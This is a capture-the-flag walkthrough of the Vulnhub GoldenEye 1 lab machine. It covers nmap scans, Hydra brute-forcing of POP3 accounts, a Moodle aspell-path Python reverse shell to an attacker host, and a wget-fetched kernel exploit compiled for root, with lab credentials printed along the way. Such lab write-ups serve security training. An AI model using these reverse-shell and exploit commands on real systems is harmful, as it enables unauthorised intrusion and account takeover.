Golden Eye 1
Golden Eye Vulnhub Walkthrough
Enumeration
nmap
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds
nmap -p- -Pn 192.168.1.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds
We can see that there are 2 more unknown port that are on the server.
Let's put the IP on the web browser

Let's navigate to /sev-home

Then if we go back to the main page and go to the inspect elements we can see a JavaScript file

We can see there is an encrypted password I copied it and paste it at google search bar then we got this surprisingly

Very obvious, the username is boris and we can login.

We can see that there is pop3 server running.
If we use nmap to enumerate both of the unknown ports
nmap -sV -p 55006,55007 192.168.1.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
55006/tcp open ssl/unknown
55007/tcp open pop3 Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds
We know that 55007 is running pop3
Exploitation
Hydra
Then we can brute force to get the password of boris
and natalya
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007


Got the password! we can now login to the pop3 server
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2
RETR 3

Nothing seems to be very interesting here, so we move on to the natalya
Doing the same thing as boris
, we got something pretty interesting here

We got a credentials and we need to add the server IP to the /etc/hosts and navigate to severnaya-station.com/gnocertdir
After doing that, we can go to the browser and navigate to severnaya-station.com/gnocertdir

We can login with the credentials he given
Then we can navigate to messages and we can see that the username is doak

Now we can take the username doak and brute force using hydra again
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007

We got the credentials, we then can go to back to the pop3 server and login

We got the credentials and we go back to the Moodle and login

We then go to the private files and we have a s3cret.txt

After cat the file out, we got this

We can see that the picture leads to the admin credentials
We can see that there is a link in the file, if we follow the link,

If we download the picture and use strings command to list out all readable content, we will get this

We can see that there is a base64 encrypted line.
After decode we got

Let's login to the Moodle using the credentials we just got

After playing around, I found out that under site administration, Plugins, and Text Editor, there is a TinyMCE HTML editor
We need to change the Spell engine from Google Spell to PSpellShell

Then, we go to the server and System Path, we can see that there is a Path to aspell section
Reverse Shell
I tried using netcat but it doesn't work so we change the section to Python reverse shell.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then we set up a listener at our machine
nc -nlvp 4444
Then we can go to blog and add new entries

After that click the spelling check to get the reverse shell


Then we can type a python command
python -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation
If we type uname -a
, we can see that the kernal is out of date

We then can searchsploit the kernal..

After that we can copy to our directory then I tried to transfer the file to the target machine but gcc
is not available in the target machine but cc
is available.
So we need to change something in the exploit
Change the gcc
to cc


Then at our machine we can fire up the SimpleHTTPServer using Python
python -m SimpleHTTPServer

On the target machine navigate to /tmp
directory and wget
the file

Then we can type
cc 37292.c -o exploit
chmod +x exploit
./exploit

Navigate to the /root
and get the .flag.txt

Then we can navigate to the URL it provided

Congratulation !
Last updated
Was this helpful?